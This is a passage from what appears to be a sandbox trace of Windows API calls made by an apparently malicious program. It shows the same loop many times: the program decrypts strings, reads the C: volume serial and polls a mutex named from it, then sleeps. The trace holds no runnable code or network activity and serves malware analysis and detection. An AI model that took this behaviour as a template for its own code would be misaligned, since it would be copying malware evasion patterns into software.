pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0173.881] CryptDestroyKey (hKey=0x29c020) returned 1 [0173.881] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0173.881] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0173.881] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0173.881] CloseHandle (hObject=0x1c0) returned 1 [0173.881] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0173.881] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0173.881] Sleep (dwMilliseconds=0x3e8) [0174.899] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0174.899] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0174.899] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0174.899] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0174.899] CryptDestroyKey (hKey=0x29c020) returned 1 [0174.900] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0174.900] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0174.900] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0174.900] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0174.900] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0174.900] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0174.900] CryptDestroyKey (hKey=0x29c020) returned 1 [0174.900] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0174.900] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0174.900] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0174.900] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0174.900] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0174.900] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0174.900] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0174.900] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0174.900] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0174.900] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0174.900] CryptDestroyKey (hKey=0x29c020) returned 1 [0174.900] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0174.900] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x2cc [0174.900] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0174.900] CloseHandle (hObject=0x2cc) returned 1 [0174.900] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0174.901] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0174.901] Sleep (dwMilliseconds=0x3e8) [0176.448] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0176.448] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0176.448] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0176.448] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0176.448] CryptDestroyKey (hKey=0x29c020) returned 1 [0176.448] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0176.448] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0176.448] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0176.448] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0176.448] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0176.448] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0176.448] CryptDestroyKey (hKey=0x29c020) returned 1 [0176.448] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0176.448] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0176.448] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0176.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0176.449] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0176.449] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0176.449] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0176.449] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0176.449] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0176.449] CryptDestroyKey (hKey=0x29c020) returned 1 [0176.449] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0176.449] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x2cc [0176.449] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0176.449] CloseHandle (hObject=0x2cc) returned 1 [0176.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0176.449] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0176.449] Sleep (dwMilliseconds=0x3e8) [0177.548] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0177.548] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0177.548] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0177.548] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0177.548] CryptDestroyKey (hKey=0x29c020) returned 1 [0177.548] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0177.548] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0177.548] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0177.548] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0177.548] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0177.548] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0177.548] CryptDestroyKey (hKey=0x29c020) returned 1 [0177.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0177.548] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0177.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0177.548] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0177.548] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0177.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0177.549] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0177.549] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0177.549] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0177.549] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0177.549] CryptDestroyKey (hKey=0x29c020) returned 1 [0177.549] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0177.549] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x2cc [0177.549] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0177.549] CloseHandle (hObject=0x2cc) returned 1 [0177.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0177.549] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0177.549] Sleep (dwMilliseconds=0x3e8) [0178.552] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0178.552] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0178.552] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0178.552] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0178.552] CryptDestroyKey (hKey=0x29c020) returned 1 [0178.552] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0178.552] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0178.552] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0178.552] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0178.552] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0178.552] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0178.552] CryptDestroyKey (hKey=0x29c020) returned 1 [0178.552] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0178.552] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0178.552] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0178.552] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0178.552] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0178.552] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0178.552] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0178.552] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0178.552] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0178.552] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0178.552] CryptDestroyKey (hKey=0x29c020) returned 1 [0178.553] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0178.553] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x2cc [0178.553] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0178.553] CloseHandle (hObject=0x2cc) returned 1 [0178.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0178.553] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0178.553] Sleep (dwMilliseconds=0x3e8) [0179.566] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0179.566] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0179.566] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0179.566] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0179.566] CryptDestroyKey (hKey=0x29c020) returned 1 [0179.566] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0179.566] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0179.566] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0179.566] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0179.566] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0179.566] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0179.566] CryptDestroyKey (hKey=0x29c020) returned 1 [0179.566] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0179.566] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0179.566] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0179.566] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0179.566] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0179.566] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0179.566] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0179.566] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0179.566] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0179.566] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0179.566] CryptDestroyKey (hKey=0x29c020) returned 1 [0179.566] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0179.567] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x2cc [0179.567] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0179.567] CloseHandle (hObject=0x2cc) returned 1 [0179.567] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0179.567] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0179.567] Sleep (dwMilliseconds=0x3e8) [0180.708] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0180.708] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0180.708] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0180.708] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0180.708] CryptDestroyKey (hKey=0x29c020) returned 1 [0180.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0180.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0180.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0180.709] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0180.709] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0180.709] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0180.709] CryptDestroyKey (hKey=0x29c020) returned 1 [0180.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0180.709] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0180.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0180.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0180.709] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0180.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0180.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0180.709] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0180.709] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0180.709] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0180.709] CryptDestroyKey (hKey=0x29c020) returned 1 [0180.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0180.709] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x2cc [0180.709] WaitForSingleObject (hHandle=0x2cc, dwMilliseconds=0x0) returned 0x102 [0180.709] CloseHandle (hObject=0x2cc) returned 1 [0180.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0180.710] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0180.710] Sleep (dwMilliseconds=0x3e8) [0181.798] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0181.798] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0181.798] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0181.798] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0181.798] CryptDestroyKey (hKey=0x29c020) returned 1 [0181.798] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0181.798] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0181.798] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0181.798] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0181.798] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0181.798] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0181.798] CryptDestroyKey (hKey=0x29c020) returned 1 [0181.798] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0181.798] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0181.798] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0181.798] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0181.798] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0181.799] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0181.799] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 